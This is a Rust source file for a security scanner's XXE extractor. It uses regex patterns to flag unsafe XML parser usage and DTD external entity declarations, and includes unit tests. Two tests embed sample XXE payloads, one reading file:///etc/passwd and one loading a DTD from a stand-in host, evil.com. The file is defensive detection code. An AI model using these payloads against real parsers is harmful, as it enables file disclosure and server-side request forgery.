stemedb/applications/aphoria/src/extractors/xxe.rs
jml 3b5f88b4f0 feat(aphoria): implement claims architecture (A1-A5) with verify engine, corpus, coverage, and explain
Complete Aphoria claims system overhaul:
- A1: Rename ExtractedClaim to Observation (extractors produce observations, not claims)
- A2: Add AuthoredClaim with full provenance, invariants, and authority tiers
- A3: Verify engine comparing observations against authored claims, CLI + formatters
- A4: Corpus as first-class assertions with predicate indexing, authority lens, trust packs
- A5: Coverage analysis, explain/docs generation, self-audit extractor, claim suggester skill

Also includes: 42 extractors updated for Observation type, verifiable_predicates trait,
conflict detection with comparison modes, claims TOML persistence, Grafana dashboard,
backup/restore scripts, and comprehensive test coverage.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-08 09:11:47 +00:00

433 lines
14 KiB
Rust

//! XML External Entity (XXE) vulnerability extractor.
//!
//! Detects patterns where XML parsers are used without disabling external entity
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{Observation, Language};
/// Extractor for XXE vulnerabilities.
///
/// Detects patterns indicating potentially unsafe XML parsing:
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
/// - JavaScript: xml2js, libxmljs
/// - Go: encoding/xml
/// - Java-style patterns (polyglot detection)
/// - DTD entity declarations
pub struct XxeExtractor {
// Python patterns
python_lxml: Regex,
python_etree: Regex,
python_minidom: Regex,
python_sax: Regex,
// JavaScript patterns
js_xml2js: Regex,
js_libxmljs: Regex,
// Go patterns
go_xml: Regex,
// Java-style patterns
java_xxe: Regex,
// DTD entity declaration
entity_decl: Regex,
}
impl Default for XxeExtractor {
fn default() -> Self {
Self::new()
}
}
impl XxeExtractor {
/// Create a new XXE extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: lxml/etree parse
python_lxml: Regex::new(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#)
.expect("valid regex"),
// Python: xml.etree.ElementTree
python_etree: Regex::new(
r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#,
)
.expect("valid regex"),
// Python: xml.dom.minidom
python_minidom: Regex::new(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#)
.expect("valid regex"),
// Python: xml.sax
python_sax: Regex::new(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#)
.expect("valid regex"),
// JavaScript: xml2js
js_xml2js: Regex::new(r#"xml2js\.(?:parseString|Parser)\s*\("#).expect("valid regex"),
// JavaScript: libxmljs
js_libxmljs: Regex::new(r#"libxmljs\.parseXml\s*\("#).expect("valid regex"),
// Go: encoding/xml
go_xml: Regex::new(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#).expect("valid regex"),
// Java-style patterns (polyglot detection in config files, etc.)
java_xxe: Regex::new(
r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
)
.expect("valid regex"),
// DTD entity declaration (dangerous in untrusted XML)
entity_decl: Regex::new(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
parser: &str,
confidence: f32,
description: &str,
) -> Observation {
build_claim(
path_segments,
&["xml", "parsing"],
"parser_config",
ObjectValue::Text(parser.to_string()),
file,
line,
matched,
confidence,
description,
)
}
}
impl Extractor for XxeExtractor {
fn name(&self) -> &str {
"xxe"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<Observation> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for DTD entity declarations (high risk in any context)
if let Some(m) = self.entity_decl.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"dtd_entity",
0.95,
"DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
));
}
match language {
Language::Python => {
// lxml/etree (can be safe with proper configuration)
if let Some(m) = self.python_lxml.find(line) {
// Lower confidence if defusedxml is imported or resolve_entities=False
let confidence = if content.contains("defusedxml")
|| line.contains("resolve_entities=False")
{
0.5
} else {
0.85
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"lxml",
confidence,
"lxml XML parsing may be vulnerable to XXE without proper config",
));
}
// xml.etree.ElementTree
if let Some(m) = self.python_etree.find(line) {
// Python 3.8+ has some protections, but external entities still a concern
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"elementtree",
0.75,
"xml.etree.ElementTree may allow external entity expansion",
));
}
// xml.dom.minidom (vulnerable by default)
if let Some(m) = self.python_minidom.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"minidom",
0.85,
"xml.dom.minidom is vulnerable to XXE attacks",
));
}
// xml.sax (needs feature flags to be safe)
if let Some(m) = self.python_sax.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sax",
0.85,
"xml.sax is vulnerable to XXE without feature_external_ges=False",
));
}
}
Language::JavaScript | Language::TypeScript => {
// xml2js (generally safer, but can be misconfigured)
if let Some(m) = self.js_xml2js.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"xml2js",
0.7,
"xml2js XML parsing - verify external entity settings",
));
}
// libxmljs (can be vulnerable)
if let Some(m) = self.js_libxmljs.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"libxmljs",
0.85,
"libxmljs may be vulnerable to XXE attacks",
));
}
}
Language::Go => {
// encoding/xml (safer by default, but DTD expansion can be issue)
if let Some(m) = self.go_xml.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"encoding_xml",
0.65,
"Go xml package - generally safe but verify with untrusted input",
));
}
}
_ => {}
}
// Check for Java patterns (polyglot detection)
if let Some(m) = self.java_xxe.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"java_parser",
0.9,
"Java XML parser - requires feature flags to prevent XXE",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_lxml() {
let extractor = XxeExtractor::new();
let content = r#"
doc = etree.parse(xml_file)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("xml/parsing"));
}
#[test]
fn test_python_lxml_with_defusedxml() {
let extractor = XxeExtractor::new();
let content = r#"
import defusedxml.ElementTree as ET
doc = etree.parse(xml_file)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
// Should still detect but with lower confidence
assert_eq!(claims.len(), 1);
assert!(claims[0].confidence < 0.6);
}
#[test]
fn test_python_elementtree() {
let extractor = XxeExtractor::new();
let content = r#"
import xml.etree.ElementTree as ET
tree = ET.parse(source)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "xml.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_minidom() {
let extractor = XxeExtractor::new();
let content = r#"
from xml.dom.minidom import parse
doc = xml.dom.minidom.parse(xml_string)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("minidom"));
}
#[test]
fn test_python_sax() {
let extractor = XxeExtractor::new();
let content = r#"
xml.sax.parse(source, handler)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_xml2js() {
let extractor = XxeExtractor::new();
let content = r#"
xml2js.parseString(xmlData, callback);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_libxmljs() {
let extractor = XxeExtractor::new();
let content = r#"
const doc = libxmljs.parseXml(xmlString);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_go_xml() {
let extractor = XxeExtractor::new();
let content = r#"
err := xml.Unmarshal(data, &result)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "parser.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_java_parser() {
let extractor = XxeExtractor::new();
let content = r#"
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Java"));
}
#[test]
fn test_dtd_entity() {
let extractor = XxeExtractor::new();
let content = r#"
<!ENTITY xxe SYSTEM "file:///etc/passwd">
"#;
// Use a non-test filename to avoid confidence reduction
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.xml");
assert_eq!(claims.len(), 1);
assert!(claims[0].confidence >= 0.9);
assert!(claims[0].description.contains("XXE attack vector"));
}
#[test]
fn test_dtd_public_entity() {
let extractor = XxeExtractor::new();
let content = r#"
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "test.xml");
assert_eq!(claims.len(), 1);
}
}